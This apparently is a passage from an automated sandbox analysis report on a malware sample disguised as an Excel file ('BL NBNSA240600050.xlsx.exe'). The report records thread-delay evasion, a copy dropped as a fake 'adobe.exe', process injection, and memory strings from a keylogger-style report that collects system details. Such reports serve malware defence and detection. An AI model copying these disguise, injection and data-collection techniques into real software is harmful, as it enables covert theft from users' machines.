Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599889
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599438
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599313
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599078
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598969
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598844
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598735
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598610
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598485
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598360
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598235
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596235
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595985
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595860
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595735
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595610
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595485
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594610
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594485
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594360
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594235
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594110
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 593985

Source: adobe.exe, 00000004.00000002.4113601588.0000000001530000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: adobe.exe, 00000007.00000002.4113469373.0000000001018000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4112215369.0000000000A21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Memory written: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe base: 400000 value starts with: 4D5A	Jump to behavior

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Process created: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe "C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior

Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002776000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <html>Time: 08/08/2024 11:13:58<br>User Name: user<br>Computer Name: 405464<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.33<br><hr><b>[ Program Manager]</b> (23/07/2024 13:24:19)<br>{Win}r{Win}r</html>
Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kq><b>[ Program Manager]</b> (23/07/2024 13:24:19)<br>{Win}r{Win}THpq
Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kq?<b>[ Program Manager]</b> (23/07/2024 13:24:19)<br>{Win}r{Win}rTHpq
Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kq3<b>[ Program Manager]</b> (23/07/2024 13:24:19)<br>
Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kq9<b>[ Program Manager]</b> (23/07/2024 13:24:19)<br>{Win}rTHpq
Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $kq8<b>[ Program Manager]</b> (23/07/2024 13:24:19)<br>{Win}THpq
Source: BL NBNSA240600050.xlsx.exe, 00000002.00000002.4116477558.0000000002762000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRkq

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
